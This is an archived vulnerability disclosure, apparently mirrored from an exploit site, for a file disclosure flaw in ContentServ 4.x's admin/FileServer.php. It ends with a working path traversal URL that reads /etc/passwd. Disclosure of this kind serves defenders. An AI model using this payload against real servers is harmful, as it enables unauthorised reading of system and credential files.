id: 1225
date: 12/01/2006
title: ContentServ 4.x (admin/FileServer.php) File Disclosure Vulnerability
author: qobaiashi
cves: 

====================================================================
ContentServ 4.x (admin/FileServer.php) File Disclosure Vulnerability
====================================================================



ContentServ again (still) features remote reading of arbitrary files
====================================================================

ContentServ is a cms and "cross media publishing" software.

Let me quote from their website:

"At ContentServ, there is always something happening. We continously enhance our products and services.[...]"

Ok.

Now for the real fun remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html


Still with me? Ok. Lets forget the sql injections for a moment, what if we try:
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd



#  0day.today [2023-03-26]  #